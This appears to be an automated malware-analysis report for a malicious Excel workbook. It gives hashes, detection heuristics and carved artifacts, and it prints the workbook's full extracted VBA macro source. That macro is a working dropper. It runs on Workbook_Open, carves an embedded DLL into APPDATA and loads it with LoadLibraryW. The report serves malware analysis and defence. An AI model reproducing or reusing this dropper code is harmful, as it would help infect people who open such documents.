Office (OLE) malware analysis — malicious · 5267210ae28394fd

MALICIOUS

Office (OLE)

279.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-05-14

MD5: 50b64ba34366fad2adb945ed87c4911d SHA-1: 370be8397eb051e0a7b53000479b3fd6d72eb031 SHA-256: 5267210ae28394fdb5718e7304bb5840057d7d09b80a901964953078f46cd776

396 Risk Score

Heuristics 11

Excel invalid object access exploit — CVE-2009-0238 critical CVE likely CVE_2009_0238

Excel workbook contains repeated malformed OBJ records whose ftMacro subrecord points to 0xFFFF, paired with shellcode-style payload context. This matches the invalid-object access exploit shape used by CVE-2009-0238 rather than a generic BIFF anomaly.
ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
        Set oApp = CreateObject("Shell.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
ChDir (Environ("TEMP"))
```
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4558 bytes
SHA-256: `8dc4fb3950f850e1bab668dd7e5ef3bf54f1f1cfde46a1a999ca369cac797741`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wbO" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" ChDir (Environ("TEMP")) UserForm1.Show ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If Win64 Then Public Declare PtrSafe Function Whisk Lib _ "masterbox2.dll" () As Integer Public Declare PtrSafe Function Whisk2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long #Else Public Declare Function Whisk2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long Public Declare Function Whisk Lib _ "masterbox1.dll" () As Integer #End If Public Sub CreateGifFile() TempName = Environ("TEMP") & "\factory.xlsx" ZipName = TempName + ".zip" ZipFolder = Environ("TEMP") '& "\UnzTmp" Dim nm As String Dim size As Long Dim num As Integer #If Win64 Then nm = Environ("APPDATA") + "\masterbox2.dll" size = 66048 num = 2 #Else nm = Environ("APPDATA") + "\masterbox1.dll" size = 77824 num = 1 #End If On Error Resume Next Kill ZipName Kill ZipFolder & "\oleObject*.bin" Kill nm On Error GoTo 0 ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False ActiveWorkbook.SaveAs TempName, FileFormat:=51 ActiveWorkbook.Close FileCopy TempName, ZipName Set oApp = CreateObject("Shell.Application") oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") Resoration ZipFolder + "\oleObject1.bin", nm, size, num ChDir (Environ("APPDATA")) No_Whisk = Whisk2(nm) Whisk End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{D6D679AA-CF1C-4CC6-AE50-CBD8D969D1A2}{FEB901ED-3744-455E-A1C3-72369FECF5DF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() CreateGifFile End Sub Private Sub UserForm_Error(ByVal Number As Integer, ByVal Description As MSForms.ReturnString, ByVal SCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, ByVal CancelDisplay As MSForms.ReturnBoolean) End Sub Attribute VB_Name = "Module2" Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer) Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte Dim DataArray() As Long ReDim DataArray(1 To fl) DataArray(1) = CByte(50 + 27) DataArray(2) = CByte(50 + 40) DataArray(3) = CByte(50 + 94) intFileNum = FreeFile Open s For Binary Access Read As intFileNum Dim cur As Integer cur = 1 Do While Not EOF(intFileNum) Get intFileNum, , bytTemp1 If bytTemp1 = DataArray(1) Then Get intFileNum, , bytTemp2 If bytTemp2 = DataArray(2) Then Get intFileNum, , bytTemp3 If bytTemp3 = DataArray(3) Then If cur = num Then For k = 4 To fl Get intFileNum, , bytTemp1 DataArray(k) = bytTemp1 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close intFileNum intFileNum = FreeFile Open nm For Binary Lock Read Write As #intFileNum For i = LBound(DataArray) To UBound(DataArray) Put #intFileNum, , CByte(DataArray(i)) Next i Close #intFileNum End Sub
`embedded_office_00003219.exe`	embedded-pe	Office MZ+PE at offset 0x3219	272871 bytes
SHA-256: `c58af6770d36f6f3e2139e5f25d5849d4b8fe5bc39a970bd0551a44bf50aaf2b`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD005CE4AB/Ole10Native	152905 bytes
SHA-256: `8946b8489b8093e48840021df69fa7c931eab4ccfbf42239e4e40b8f7793fc0d`
`ole10native_00_E12BD00A.png`	ole-package-payload	OLE Ole10Native payload: MBD005CE4AB/Ole10Native; display_name=E12BD00A.png; full_path=C:\Users\1\AppData\Local\Temp\E12BD00A.png; temp_path=; def_file=	152434 bytes
SHA-256: `4448d3644e792795055303401864bdb9be2df8d6d98e31e988301c1f72402207`

Open this report in the interactive analyzer, or submit your own file for analysis.